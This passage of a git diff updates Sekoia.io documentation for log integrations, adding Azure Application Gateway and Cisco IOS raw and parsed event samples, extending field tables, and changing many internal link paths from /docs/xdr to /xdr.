+|`azure.application_gateway.sslClientVerify` | `keyword` | The SSL client verification status. | +|`azure.application_gateway.transactionId` | `keyword` | The unique identifier for the transaction. | +|`cloud.instance.id` | `keyword` | Instance ID of the host machine. | +|`cloud.provider` | `keyword` | Name of the cloud provider. | +|`cloud.service.name` | `keyword` | The cloud service name. | +|`destination.bytes` | `long` | Bytes sent from the destination to the source. | +|`destination.ip` | `ip` | IP address of the destination. | +|`destination.port` | `long` | Port of the destination. | +|`event.action` | `keyword` | The action captured by the event. 
| +|`event.category` | `keyword` | Event category. The second categorization field in the hierarchy. | +|`event.dataset` | `keyword` | Name of the dataset. | +|`event.reason` | `keyword` | Reason why this event happened, according to the source | +|`event.type` | `keyword` | Event type. The third categorization field in the hierarchy. | +|`http.request.method` | `keyword` | HTTP request method. | +|`http.response.status_code` | `long` | HTTP response status code. | +|`network.bytes` | `long` | Total bytes transferred in both directions. | +|`source.bytes` | `long` | Bytes sent from the source to the destination. | +|`source.ip` | `ip` | IP address of the source. | +|`source.port` | `long` | Port of the source. | +|`url.original` | `wildcard` | Unmodified original url as seen in the event source. | +|`user_agent.original` | `keyword` | Unparsed user_agent string. | + + + +For more information on the Intake Format, please find the code of the Parser, Smart Descriptions, and Supported Events [here](https://github.com/SEKOIA-IO/intake-formats/tree/main/Azure/azure-application-gateway). \ No newline at end of file diff --git a/_shared_content/operations_center/integrations/generated/6967b0ca-f27e-480a-b124-fa4ab0b9d889_sample.md b/_shared_content/operations_center/integrations/generated/6967b0ca-f27e-480a-b124-fa4ab0b9d889_sample.md new file mode 100644 index 0000000000..2dbb9cd23c --- /dev/null +++ b/_shared_content/operations_center/integrations/generated/6967b0ca-f27e-480a-b124-fa4ab0b9d889_sample.md 
@@ -0,0 +1,123 @@ + +### Raw Events Samples + +In this section, you will find examples of raw logs as generated natively by the source. These examples are provided to help integrators understand the data format before ingestion into Sekoia.io. It is crucial for setting up the correct parsing stages and ensuring that all relevant information is captured. + + +=== "test_accesslog_1" + + + ```json + { + "resourceId": "/SUBSCRIPTIONS//RESOURCEGROUPS//PROVIDERS/MICROSOFT.NETWORK/APPLICATIONGATEWAYS/", + "operationName": "ApplicationGatewayAccess", + "time": "2016-04-11T04:24:37Z", + "category": "ApplicationGatewayAccessLog", + "properties": { + "instanceId": "ApplicationGatewayRole_IN_0", + "clientIP": "37.186.113.170", + "clientPort": "12345", + "httpMethod": "HEAD", + "requestUri": "/xyz/portal", + "requestQuery": "", + "userAgent": "-", + "httpStatus": "200", + "httpVersion": "HTTP/1.0", + "receivedBytes": "27", + "sentBytes": "202", + "timeTaken": "359", + "sslEnabled": "off" + } + } + ``` + + + +=== "test_accesslog_2" + + + ```json + { + "timeStamp": "2021-10-14T22:17:11+00:00", + "resourceId": "/SUBSCRIPTIONS/{subscriptionId}/RESOURCEGROUPS/{resourceGroupName}/PROVIDERS/MICROSOFT.NETWORK/APPLICATIONGATEWAYS/{applicationGatewayName}", + "listenerName": "HTTP-Listener", + "ruleName": "Storage-Static-Rule", + "backendPoolName": "StaticStorageAccount", + "backendSettingName": "StorageStatic-HTTPS-Setting", + "operationName": "ApplicationGatewayAccess", + "category": "ApplicationGatewayAccessLog", + "properties": { + "instanceId": "appgw_2", + "clientIP": "185.42.129.24", + "clientPort": 45057, + "httpMethod": "GET", + "originalRequestUriWithArgs": "/", + "requestUri": "/", + "requestQuery": "", + "userAgent": "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36", + "httpStatus": 200, + "httpVersion": "HTTP/1.1", + "receivedBytes": 184, + "sentBytes": 466, + "clientResponseTime": 0, + "timeTaken": 0.034, + 
"WAFEvaluationTime": "0.000", + "WAFMode": "Detection", + "transactionId": "592d1649f75a8d480a3c4dc6a975309d", + "sslEnabled": "on", + "sslCipher": "ECDHE-RSA-AES256-GCM-SHA384", + "sslProtocol": "TLSv1.2", + "sslClientVerify": "NONE", + "sslClientCertificateFingerprint": "", + "sslClientCertificateIssuerName": "", + "serverRouted": "52.239.221.65:443", + "serverStatus": "200", + "serverResponseLatency": "0.028", + "upstreamSourcePort": "21564", + "originalHost": "20.110.30.194", + "host": "20.110.30.194", + "error_info": "ERRORINFO_NO_ERROR", + "contentType": "application/json" + } + } + ``` + + + +=== "test_fwlog_1" + + + ```json + { + "timeStamp": "2021-10-14T22:17:11+00:00", + "resourceId": "/SUBSCRIPTIONS/{subscriptionId}/RESOURCEGROUPS/{resourceGroupName}/PROVIDERS/MICROSOFT.NETWORK/APPLICATIONGATEWAYS/{applicationGatewayName}", + "operationName": "ApplicationGatewayFirewall", + "category": "ApplicationGatewayFirewallLog", + "properties": { + "instanceId": "appgw_2", + "clientIp": "185.42.129.24", + "clientPort": "", + "requestUri": "/", + "ruleSetType": "OWASP_CRS", + "ruleSetVersion": "3.0.0", + "ruleId": "920350", + "message": "Host header is a numeric IP address", + "action": "Matched", + "site": "Global", + "details": { + "message": "Warning. Pattern match \\\"^[\\\\d.:]+$\\\" at REQUEST_HEADERS:Host .... ", + "data": "20.110.30.194:80", + "file": "rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf", + "line": "791" + }, + "hostname": "20.110.30.194:80", + "transactionId": "592d1649f75a8d480a3c4dc6a975309d", + "policyId": "default", + "policyScope": "Global", + "policyScopeName": "Global" + } + } + ``` + + + diff --git a/_shared_content/operations_center/integrations/generated/69b52166-b804-4f47-860f-2d3fd0b46987.md b/_shared_content/operations_center/integrations/generated/69b52166-b804-4f47-860f-2d3fd0b46987.md index 5251e4fe35..409d140e1b 100644 --- a/_shared_content/operations_center/integrations/generated/69b52166-b804-4f47-860f-2d3fd0b46987.md 
+++ b/_shared_content/operations_center/integrations/generated/69b52166-b804-4f47-860f-2d3fd0b46987.md @@ -26,7 +26,7 @@ In details, the following table denotes the type of events produced by this inte ### Transformed Events Samples after Ingestion -This section demonstrates how the raw logs will be transformed by our parsers. It shows the extracted fields that will be available for use in the [built-in detection rules](/docs/xdr/features/detect/rules_catalog) and hunting activities in the [events page](/docs/xdr/features/investigate/events). Understanding these transformations is essential for analysts to create effective detection mechanisms with [custom detection rules](/docs/xdr/features/detect/sigma) and to leverage the full potential of the collected data. +This section demonstrates how the raw logs will be transformed by our parsers. It shows the extracted fields that will be available for use in the [built-in detection rules](/xdr/features/detect/rules_catalog) and hunting activities in the [events page](/xdr/features/investigate/events). Understanding these transformations is essential for analysts to create effective detection mechanisms with [custom detection rules](/xdr/features/detect/sigma) and to leverage the full potential of the collected data. === "test_accesslog.json" diff --git a/_shared_content/operations_center/integrations/generated/6b8cb346-6605-4240-ac15-3828627ba899.md b/_shared_content/operations_center/integrations/generated/6b8cb346-6605-4240-ac15-3828627ba899.md index 56255472fb..6d89584d41 100644 --- a/_shared_content/operations_center/integrations/generated/6b8cb346-6605-4240-ac15-3828627ba899.md +++ b/_shared_content/operations_center/integrations/generated/6b8cb346-6605-4240-ac15-3828627ba899.md 
@@ -25,7 +25,7 @@ In details, the following table denotes the type of events produced by this inte ### Transformed Events Samples after Ingestion -This section demonstrates how the raw logs will be transformed by our parsers. It shows the extracted fields that will be available for use in the [built-in detection rules](/docs/xdr/features/detect/rules_catalog) and hunting activities in the [events page](/docs/xdr/features/investigate/events). Understanding these transformations is essential for analysts to create effective detection mechanisms with [custom detection rules](/docs/xdr/features/detect/sigma) and to leverage the full potential of the collected data. +This section demonstrates how the raw logs will be transformed by our parsers. It shows the extracted fields that will be available for use in the [built-in detection rules](/xdr/features/detect/rules_catalog) and hunting activities in the [events page](/xdr/features/investigate/events). Understanding these transformations is essential for analysts to create effective detection mechanisms with [custom detection rules](/xdr/features/detect/sigma) and to leverage the full potential of the collected data. === "cron.json" diff --git a/_shared_content/operations_center/integrations/generated/6c2a44e3-a86a-4d98-97a6-d575ffcb29f7.md b/_shared_content/operations_center/integrations/generated/6c2a44e3-a86a-4d98-97a6-d575ffcb29f7.md index 7888d570e0..43157371cb 100644 --- a/_shared_content/operations_center/integrations/generated/6c2a44e3-a86a-4d98-97a6-d575ffcb29f7.md +++ b/_shared_content/operations_center/integrations/generated/6c2a44e3-a86a-4d98-97a6-d575ffcb29f7.md 
@@ -26,7 +26,7 @@ In details, the following table denotes the type of events produced by this inte ### Transformed Events Samples after Ingestion -This section demonstrates how the raw logs will be transformed by our parsers. It shows the extracted fields that will be available for use in the [built-in detection rules](/docs/xdr/features/detect/rules_catalog) and hunting activities in the [events page](/docs/xdr/features/investigate/events). Understanding these transformations is essential for analysts to create effective detection mechanisms with [custom detection rules](/docs/xdr/features/detect/sigma) and to leverage the full potential of the collected data. +This section demonstrates how the raw logs will be transformed by our parsers. It shows the extracted fields that will be available for use in the [built-in detection rules](/xdr/features/detect/rules_catalog) and hunting activities in the [events page](/xdr/features/investigate/events). Understanding these transformations is essential for analysts to create effective detection mechanisms with [custom detection rules](/xdr/features/detect/sigma) and to leverage the full potential of the collected data. === "access_combined.json" diff --git a/_shared_content/operations_center/integrations/generated/6dbdd199-77ae-4705-a5de-5c2722fa020e.md b/_shared_content/operations_center/integrations/generated/6dbdd199-77ae-4705-a5de-5c2722fa020e.md index 20f9ff3724..e9c00bfc3b 100644 --- a/_shared_content/operations_center/integrations/generated/6dbdd199-77ae-4705-a5de-5c2722fa020e.md +++ b/_shared_content/operations_center/integrations/generated/6dbdd199-77ae-4705-a5de-5c2722fa020e.md 
@@ -25,7 +25,7 @@ In details, the following table denotes the type of events produced by this inte ### Transformed Events Samples after Ingestion -This section demonstrates how the raw logs will be transformed by our parsers. It shows the extracted fields that will be available for use in the [built-in detection rules](/docs/xdr/features/detect/rules_catalog) and hunting activities in the [events page](/docs/xdr/features/investigate/events). Understanding these transformations is essential for analysts to create effective detection mechanisms with [custom detection rules](/docs/xdr/features/detect/sigma) and to leverage the full potential of the collected data. +This section demonstrates how the raw logs will be transformed by our parsers. It shows the extracted fields that will be available for use in the [built-in detection rules](/xdr/features/detect/rules_catalog) and hunting activities in the [events page](/xdr/features/investigate/events). Understanding these transformations is essential for analysts to create effective detection mechanisms with [custom detection rules](/xdr/features/detect/sigma) and to leverage the full potential of the collected data. === "test_access_event.json" diff --git a/_shared_content/operations_center/integrations/generated/700f332f-d515-4bc5-8a62-49fa5f2c9206.md b/_shared_content/operations_center/integrations/generated/700f332f-d515-4bc5-8a62-49fa5f2c9206.md index e3df8101e7..79fee844c5 100644 --- a/_shared_content/operations_center/integrations/generated/700f332f-d515-4bc5-8a62-49fa5f2c9206.md +++ b/_shared_content/operations_center/integrations/generated/700f332f-d515-4bc5-8a62-49fa5f2c9206.md 
@@ -27,7 +27,7 @@ In details, the following table denotes the type of events produced by this inte ### Transformed Events Samples after Ingestion -This section demonstrates how the raw logs will be transformed by our parsers. It shows the extracted fields that will be available for use in the [built-in detection rules](/docs/xdr/features/detect/rules_catalog) and hunting activities in the [events page](/docs/xdr/features/investigate/events). Understanding these transformations is essential for analysts to create effective detection mechanisms with [custom detection rules](/docs/xdr/features/detect/sigma) and to leverage the full potential of the collected data. +This section demonstrates how the raw logs will be transformed by our parsers. It shows the extracted fields that will be available for use in the [built-in detection rules](/xdr/features/detect/rules_catalog) and hunting activities in the [events page](/xdr/features/investigate/events). Understanding these transformations is essential for analysts to create effective detection mechanisms with [custom detection rules](/xdr/features/detect/sigma) and to leverage the full potential of the collected data. === "test_lineproto_down.json" @@ -158,6 +158,46 @@ This section demonstrates how the raw logs will be transformed by our parsers. I ``` +=== "test_link_down_1.json" + + ```json + + { + "message": "Jul 3 2024 16:39:13 CEST: %LINK-3-UPDOWN: Interface GigabitEthernet2/0/14, changed state to down", + "event": { + "action": "down", + "category": [ + "host" + ], + "code": "UPDOWN", + "reason": "Interface GigabitEthernet2/0/14, changed state to down", + "severity": 3, + "type": [ + "info" + ] + }, + "@timestamp": "2024-07-03T14:39:13Z", + "cisco": { + "ios": { + "event": { + "facility": "LINK" + }, + "observer": { + "interface": { + "name": "GigabitEthernet2/0/14" + } + } + } + }, + "observer": { + "product": "ios", + "vendor": "Cisco" + } + } + + ``` + + === "test_link_up.json" ```json 
@@ -359,6 +399,40 @@ This section demonstrates how the raw logs will be transformed by our parsers. I ``` +=== "test_mab_fail.json" + + ```json + + { + "message": "Jul 3 2024 16:40:48: %MAB-5-FAIL: Authentication failed for client (0000.0000.0000) on Interface Gi2/0/7 AuditSessionID 0000000D0000000000000000", + "event": { + "category": [ + "host" + ], + "code": "FAIL", + "reason": "Authentication failed for client (0000.0000.0000) on Interface Gi2/0/7 AuditSessionID 0000000D0000000000000000", + "severity": 5, + "type": [ + "info" + ] + }, + "@timestamp": "2024-07-03T16:40:48Z", + "cisco": { + "ios": { + "event": { + "facility": "MAB" + } + } + }, + "observer": { + "product": "ios", + "vendor": "Cisco" + } + } + + ``` + + === "test_sys_macflap.json" ```json diff --git a/_shared_content/operations_center/integrations/generated/700f332f-d515-4bc5-8a62-49fa5f2c9206_sample.md b/_shared_content/operations_center/integrations/generated/700f332f-d515-4bc5-8a62-49fa5f2c9206_sample.md index cbbd07a3f8..c77957a308 100644 --- a/_shared_content/operations_center/integrations/generated/700f332f-d515-4bc5-8a62-49fa5f2c9206_sample.md +++ b/_shared_content/operations_center/integrations/generated/700f332f-d515-4bc5-8a62-49fa5f2c9206_sample.md @@ -28,6 +28,14 @@ In this section, you will find examples of raw logs as generated natively by the +=== "test_link_down_1" + + ``` + Jul 3 2024 16:39:13 CEST: %LINK-3-UPDOWN: Interface GigabitEthernet2/0/14, changed state to down + ``` + + + === "test_link_up" ``` @@ -60,6 +68,14 @@ In this section, you will find examples of raw logs as generated natively by the +=== "test_mab_fail" + + ``` + Jul 3 2024 16:40:48: %MAB-5-FAIL: Authentication failed for client (0000.0000.0000) on Interface Gi2/0/7 AuditSessionID 0000000D0000000000000000 + ``` + + + === "test_sys_macflap" ``` 
diff --git a/_shared_content/operations_center/integrations/generated/70c5c3db-fae8-4825-8d8b-08d6315e1ef6.md b/_shared_content/operations_center/integrations/generated/70c5c3db-fae8-4825-8d8b-08d6315e1ef6.md index 747a145733..5a4672e794 100644 --- a/_shared_content/operations_center/integrations/generated/70c5c3db-fae8-4825-8d8b-08d6315e1ef6.md +++ b/_shared_content/operations_center/integrations/generated/70c5c3db-fae8-4825-8d8b-08d6315e1ef6.md @@ -26,7 +26,7 @@ In details, the following table denotes the type of events produced by this inte ### Transformed Events Samples after Ingestion -This section demonstrates how the raw logs will be transformed by our parsers. It shows the extracted fields that will be available for use in the [built-in detection rules](/docs/xdr/features/detect/rules_catalog) and hunting activities in the [events page](/docs/xdr/features/investigate/events). Understanding these transformations is essential for analysts to create effective detection mechanisms with [custom detection rules](/docs/xdr/features/detect/sigma) and to leverage the full potential of the collected data. +This section demonstrates how the raw logs will be transformed by our parsers. It shows the extracted fields that will be available for use in the [built-in detection rules](/xdr/features/detect/rules_catalog) and hunting activities in the [events page](/xdr/features/investigate/events). Understanding these transformations is essential for analysts to create effective detection mechanisms with [custom detection rules](/xdr/features/detect/sigma) and to leverage the full potential of the collected data. === "storage_delete.json" diff --git a/_shared_content/operations_center/integrations/generated/76d767ed-5431-4db1-b893-a48b6903d871.md b/_shared_content/operations_center/integrations/generated/76d767ed-5431-4db1-b893-a48b6903d871.md index 402279da6a..8983c2d95a 100644 
--- a/_shared_content/operations_center/integrations/generated/76d767ed-5431-4db1-b893-a48b6903d871.md +++ b/_shared_content/operations_center/integrations/generated/76d767ed-5431-4db1-b893-a48b6903d871.md @@ -25,7 +25,7 @@ In details, the following table denotes the type of events produced by this inte ### Transformed Events Samples after Ingestion -This section demonstrates how the raw logs will be transformed by our parsers. It shows the extracted fields that will be available for use in the [built-in detection rules](/docs/xdr/features/detect/rules_catalog) and hunting activities in the [events page](/docs/xdr/features/investigate/events). Understanding these transformations is essential for analysts to create effective detection mechanisms with [custom detection rules](/docs/xdr/features/detect/sigma) and to leverage the full potential of the collected data. +This section demonstrates how the raw logs will be transformed by our parsers. It shows the extracted fields that will be available for use in the [built-in detection rules](/xdr/features/detect/rules_catalog) and hunting activities in the [events page](/xdr/features/investigate/events). Understanding these transformations is essential for analysts to create effective detection mechanisms with [custom detection rules](/xdr/features/detect/sigma) and to leverage the full potential of the collected data. === "test_gateway_create.json" diff --git a/_shared_content/operations_center/integrations/generated/79029ef9-e5d3-44f3-b70f-fd3b54ba1fe4.md b/_shared_content/operations_center/integrations/generated/79029ef9-e5d3-44f3-b70f-fd3b54ba1fe4.md index deb3cf25d8..20483a6a71 100644 --- a/_shared_content/operations_center/integrations/generated/79029ef9-e5d3-44f3-b70f-fd3b54ba1fe4.md +++ b/_shared_content/operations_center/integrations/generated/79029ef9-e5d3-44f3-b70f-fd3b54ba1fe4.md 
@@ -28,7 +28,7 @@ In details, the following table denotes the type of events produced by this inte ### Transformed Events Samples after Ingestion -This section demonstrates how the raw logs will be transformed by our parsers. It shows the extracted fields that will be available for use in the [built-in detection rules](/docs/xdr/features/detect/rules_catalog) and hunting activities in the [events page](/docs/xdr/features/investigate/events). Understanding these transformations is essential for analysts to create effective detection mechanisms with [custom detection rules](/docs/xdr/features/detect/sigma) and to leverage the full potential of the collected data. +This section demonstrates how the raw logs will be transformed by our parsers. It shows the extracted fields that will be available for use in the [built-in detection rules](/xdr/features/detect/rules_catalog) and hunting activities in the [events page](/xdr/features/investigate/events). Understanding these transformations is essential for analysts to create effective detection mechanisms with [custom detection rules](/xdr/features/detect/sigma) and to leverage the full potential of the collected data. === "alarm1.json" diff --git a/_shared_content/operations_center/integrations/generated/7954ae6f-eafa-404d-8e15-4b99a12b754c.md b/_shared_content/operations_center/integrations/generated/7954ae6f-eafa-404d-8e15-4b99a12b754c.md index 0c2ac474a0..5368c137f8 100644 --- a/_shared_content/operations_center/integrations/generated/7954ae6f-eafa-404d-8e15-4b99a12b754c.md +++ b/_shared_content/operations_center/integrations/generated/7954ae6f-eafa-404d-8e15-4b99a12b754c.md 
@@ -18,7 +18,7 @@ The following table lists the data source offered by this integration. ### Transformed Events Samples after Ingestion -This section demonstrates how the raw logs will be transformed by our parsers. It shows the extracted fields that will be available for use in the [built-in detection rules](/docs/xdr/features/detect/rules_catalog) and hunting activities in the [events page](/docs/xdr/features/investigate/events). Understanding these transformations is essential for analysts to create effective detection mechanisms with [custom detection rules](/docs/xdr/features/detect/sigma) and to leverage the full potential of the collected data. +This section demonstrates how the raw logs will be transformed by our parsers. It shows the extracted fields that will be available for use in the [built-in detection rules](/xdr/features/detect/rules_catalog) and hunting activities in the [events page](/xdr/features/investigate/events). Understanding these transformations is essential for analysts to create effective detection mechanisms with [custom detection rules](/xdr/features/detect/sigma) and to leverage the full potential of the collected data. === "dns.json" diff --git a/_shared_content/operations_center/integrations/generated/7a12aa3b-ec73-4ebb-8fb3-f7c543fd84a5.md b/_shared_content/operations_center/integrations/generated/7a12aa3b-ec73-4ebb-8fb3-f7c543fd84a5.md index 75e11e48bc..0a860b452d 100644 --- a/_shared_content/operations_center/integrations/generated/7a12aa3b-ec73-4ebb-8fb3-f7c543fd84a5.md +++ b/_shared_content/operations_center/integrations/generated/7a12aa3b-ec73-4ebb-8fb3-f7c543fd84a5.md 
@@ -27,7 +27,7 @@ In details, the following table denotes the type of events produced by this inte ### Transformed Events Samples after Ingestion -This section demonstrates how the raw logs will be transformed by our parsers. It shows the extracted fields that will be available for use in the [built-in detection rules](/docs/xdr/features/detect/rules_catalog) and hunting activities in the [events page](/docs/xdr/features/investigate/events). Understanding these transformations is essential for analysts to create effective detection mechanisms with [custom detection rules](/docs/xdr/features/detect/sigma) and to leverage the full potential of the collected data. +This section demonstrates how the raw logs will be transformed by our parsers. It shows the extracted fields that will be available for use in the [built-in detection rules](/xdr/features/detect/rules_catalog) and hunting activities in the [events page](/xdr/features/investigate/events). Understanding these transformations is essential for analysts to create effective detection mechanisms with [custom detection rules](/xdr/features/detect/sigma) and to leverage the full potential of the collected data. === "host_checker_policy_failed.json" diff --git a/_shared_content/operations_center/integrations/generated/7b1317ec-3f87-4b53-9b6d-3f79045f28fa.md b/_shared_content/operations_center/integrations/generated/7b1317ec-3f87-4b53-9b6d-3f79045f28fa.md index dc05c12977..6e1bfedf2a 100644 --- a/_shared_content/operations_center/integrations/generated/7b1317ec-3f87-4b53-9b6d-3f79045f28fa.md +++ b/_shared_content/operations_center/integrations/generated/7b1317ec-3f87-4b53-9b6d-3f79045f28fa.md 
@@ -25,7 +25,7 @@ In details, the following table denotes the type of events produced by this inte ### Transformed Events Samples after Ingestion -This section demonstrates how the raw logs will be transformed by our parsers. It shows the extracted fields that will be available for use in the [built-in detection rules](/docs/xdr/features/detect/rules_catalog) and hunting activities in the [events page](/docs/xdr/features/investigate/events). Understanding these transformations is essential for analysts to create effective detection mechanisms with [custom detection rules](/docs/xdr/features/detect/sigma) and to leverage the full potential of the collected data. +This section demonstrates how the raw logs will be transformed by our parsers. It shows the extracted fields that will be available for use in the [built-in detection rules](/xdr/features/detect/rules_catalog) and hunting activities in the [events page](/xdr/features/investigate/events). Understanding these transformations is essential for analysts to create effective detection mechanisms with [custom detection rules](/xdr/features/detect/sigma) and to leverage the full potential of the collected data. === "test_dns.json" diff --git a/_shared_content/operations_center/integrations/generated/7b75d498-4a65-4d44-aa81-31090d723a60.md b/_shared_content/operations_center/integrations/generated/7b75d498-4a65-4d44-aa81-31090d723a60.md index 934b733521..09e070e281 100644 --- a/_shared_content/operations_center/integrations/generated/7b75d498-4a65-4d44-aa81-31090d723a60.md +++ b/_shared_content/operations_center/integrations/generated/7b75d498-4a65-4d44-aa81-31090d723a60.md 
@@ -25,7 +25,7 @@ In details, the following table denotes the type of events produced by this inte ### Transformed Events Samples after Ingestion -This section demonstrates how the raw logs will be transformed by our parsers. It shows the extracted fields that will be available for use in the [built-in detection rules](/docs/xdr/features/detect/rules_catalog) and hunting activities in the [events page](/docs/xdr/features/investigate/events). Understanding these transformations is essential for analysts to create effective detection mechanisms with [custom detection rules](/docs/xdr/features/detect/sigma) and to leverage the full potential of the collected data. +This section demonstrates how the raw logs will be transformed by our parsers. It shows the extracted fields that will be available for use in the [built-in detection rules](/xdr/features/detect/rules_catalog) and hunting activities in the [events page](/xdr/features/investigate/events). Understanding these transformations is essential for analysts to create effective detection mechanisms with [custom detection rules](/xdr/features/detect/sigma) and to leverage the full potential of the collected data. === "test_email_event.json" @@ -78,6 +78,9 @@ This section demonstrates how the raw logs will be transformed by our parsers. I "version": "0.0.1" }, "related": { + "hosts": [ + "HOSTNAME" + ], "ip": [ "192.168.0.1" ], @@ -91,7 +94,8 @@ This section demonstrates how the raw logs will be transformed by our parsers. I "name": "Rule Name" }, "source": { - "address": "192.168.0.1", + "address": "HOSTNAME", + "domain": "HOSTNAME", "ip": "192.168.0.1" }, "user": { 
@@ -170,6 +174,7 @@ The following table lists the fields that are extracted, normalized under the EC |`event.end` | `date` | event.end contains the date when the event ended or when the activity was last observed. | |`event.kind` | `keyword` | The kind of the event. The highest categorization field in the hierarchy. | |`event.reason` | `keyword` | Reason why this event happened, according to the source | +|`event.severity` | `long` | Numeric severity of the event. | |`event.type` | `keyword` | Event type. The third categorization field in the hierarchy. | |`event.url` | `keyword` | Event investigation URL | |`file.name` | `keyword` | Name of the file including the extension, without the directory. | @@ -181,6 +186,7 @@ The following table lists the fields that are extracted, normalized under the EC |`rule.description` | `keyword` | Rule description | |`rule.id` | `keyword` | Rule ID | |`rule.name` | `keyword` | Rule name | +|`source.domain` | `keyword` | The domain name of the source. | |`source.ip` | `ip` | IP address of the source. | |`user.name` | `keyword` | Short name or login of the user. | |`varonis.datalert.file.old_permission` | `keyword` | The permissions before the change. Data is not collected for all event types. | diff --git a/_shared_content/operations_center/integrations/generated/80b8382e-0667-4469-bbc9-74be1e0ca1c1.md b/_shared_content/operations_center/integrations/generated/80b8382e-0667-4469-bbc9-74be1e0ca1c1.md index 4ee2444c01..b03037f3ab 100644 --- a/_shared_content/operations_center/integrations/generated/80b8382e-0667-4469-bbc9-74be1e0ca1c1.md +++ b/_shared_content/operations_center/integrations/generated/80b8382e-0667-4469-bbc9-74be1e0ca1c1.md 
@@ -26,7 +26,7 @@ In details, the following table denotes the type of events produced by this inte ### Transformed Events Samples after Ingestion -This section demonstrates how the raw logs will be transformed by our parsers. It shows the extracted fields that will be available for use in the [built-in detection rules](/docs/xdr/features/detect/rules_catalog) and hunting activities in the [events page](/docs/xdr/features/investigate/events). Understanding these transformations is essential for analysts to create effective detection mechanisms with [custom detection rules](/docs/xdr/features/detect/sigma) and to leverage the full potential of the collected data. +This section demonstrates how the raw logs will be transformed by our parsers. It shows the extracted fields that will be available for use in the [built-in detection rules](/xdr/features/detect/rules_catalog) and hunting activities in the [events page](/xdr/features/investigate/events). Understanding these transformations is essential for analysts to create effective detection mechanisms with [custom detection rules](/xdr/features/detect/sigma) and to leverage the full potential of the collected data. === "access_accept_event.json" diff --git a/_shared_content/operations_center/integrations/generated/80de6ccb-7246-40de-bcbb-bc830118c1f9.md b/_shared_content/operations_center/integrations/generated/80de6ccb-7246-40de-bcbb-bc830118c1f9.md index cefd6c32b6..fd3c76928c 100644 --- a/_shared_content/operations_center/integrations/generated/80de6ccb-7246-40de-bcbb-bc830118c1f9.md +++ b/_shared_content/operations_center/integrations/generated/80de6ccb-7246-40de-bcbb-bc830118c1f9.md 
@@ -25,7 +25,7 @@ In details, the following table denotes the type of events produced by this inte ### Transformed Events Samples after Ingestion -This section demonstrates how the raw logs will be transformed by our parsers. It shows the extracted fields that will be available for use in the [built-in detection rules](/docs/xdr/features/detect/rules_catalog) and hunting activities in the [events page](/docs/xdr/features/investigate/events). Understanding these transformations is essential for analysts to create effective detection mechanisms with [custom detection rules](/docs/xdr/features/detect/sigma) and to leverage the full potential of the collected data. +This section demonstrates how the raw logs will be transformed by our parsers. It shows the extracted fields that will be available for use in the [built-in detection rules](/xdr/features/detect/rules_catalog) and hunting activities in the [events page](/xdr/features/investigate/events). Understanding these transformations is essential for analysts to create effective detection mechanisms with [custom detection rules](/xdr/features/detect/sigma) and to leverage the full potential of the collected data. === "test_block_user.json" diff --git a/_shared_content/operations_center/integrations/generated/838ed6e5-6d5e-4a5b-b079-ab35ac6b2ab9.md b/_shared_content/operations_center/integrations/generated/838ed6e5-6d5e-4a5b-b079-ab35ac6b2ab9.md index 447610da87..87d7983dff 100644 --- a/_shared_content/operations_center/integrations/generated/838ed6e5-6d5e-4a5b-b079-ab35ac6b2ab9.md +++ b/_shared_content/operations_center/integrations/generated/838ed6e5-6d5e-4a5b-b079-ab35ac6b2ab9.md 
@@ -25,7 +25,7 @@ In details, the following table denotes the type of events produced by this inte ### Transformed Events Samples after Ingestion -This section demonstrates how the raw logs will be transformed by our parsers. It shows the extracted fields that will be available for use in the [built-in detection rules](/docs/xdr/features/detect/rules_catalog) and hunting activities in the [events page](/docs/xdr/features/investigate/events). Understanding these transformations is essential for analysts to create effective detection mechanisms with [custom detection rules](/docs/xdr/features/detect/sigma) and to leverage the full potential of the collected data. +This section demonstrates how the raw logs will be transformed by our parsers. It shows the extracted fields that will be available for use in the [built-in detection rules](/xdr/features/detect/rules_catalog) and hunting activities in the [events page](/xdr/features/investigate/events). Understanding these transformations is essential for analysts to create effective detection mechanisms with [custom detection rules](/xdr/features/detect/sigma) and to leverage the full potential of the collected data. === "test_event.json" diff --git a/_shared_content/operations_center/integrations/generated/8461aabe-6eba-4044-ad7f-a0c39a2b2279.md b/_shared_content/operations_center/integrations/generated/8461aabe-6eba-4044-ad7f-a0c39a2b2279.md index 8ee61aece6..205f3bec3f 100644 --- a/_shared_content/operations_center/integrations/generated/8461aabe-6eba-4044-ad7f-a0c39a2b2279.md +++ b/_shared_content/operations_center/integrations/generated/8461aabe-6eba-4044-ad7f-a0c39a2b2279.md 
@@ -26,7 +26,7 @@ In details, the following table denotes the type of events produced by this inte ### Transformed Events Samples after Ingestion -This section demonstrates how the raw logs will be transformed by our parsers. It shows the extracted fields that will be available for use in the [built-in detection rules](/docs/xdr/features/detect/rules_catalog) and hunting activities in the [events page](/docs/xdr/features/investigate/events). Understanding these transformations is essential for analysts to create effective detection mechanisms with [custom detection rules](/docs/xdr/features/detect/sigma) and to leverage the full potential of the collected data. +This section demonstrates how the raw logs will be transformed by our parsers. It shows the extracted fields that will be available for use in the [built-in detection rules](/xdr/features/detect/rules_catalog) and hunting activities in the [events page](/xdr/features/investigate/events). Understanding these transformations is essential for analysts to create effective detection mechanisms with [custom detection rules](/xdr/features/detect/sigma) and to leverage the full potential of the collected data. === "messagetrace.json" diff --git a/_shared_content/operations_center/integrations/generated/8510051d-c7cf-4b0c-a398-031afe91faa0.md b/_shared_content/operations_center/integrations/generated/8510051d-c7cf-4b0c-a398-031afe91faa0.md index 1cb2029539..8695c64480 100644 --- a/_shared_content/operations_center/integrations/generated/8510051d-c7cf-4b0c-a398-031afe91faa0.md +++ b/_shared_content/operations_center/integrations/generated/8510051d-c7cf-4b0c-a398-031afe91faa0.md 
@@ -25,7 +25,7 @@ In details, the following table denotes the type of events produced by this inte ### Transformed Events Samples after Ingestion -This section demonstrates how the raw logs will be transformed by our parsers. It shows the extracted fields that will be available for use in the [built-in detection rules](/docs/xdr/features/detect/rules_catalog) and hunting activities in the [events page](/docs/xdr/features/investigate/events). Understanding these transformations is essential for analysts to create effective detection mechanisms with [custom detection rules](/docs/xdr/features/detect/sigma) and to leverage the full potential of the collected data. +This section demonstrates how the raw logs will be transformed by our parsers. It shows the extracted fields that will be available for use in the [built-in detection rules](/xdr/features/detect/rules_catalog) and hunting activities in the [events page](/xdr/features/investigate/events). Understanding these transformations is essential for analysts to create effective detection mechanisms with [custom detection rules](/xdr/features/detect/sigma) and to leverage the full potential of the collected data. === 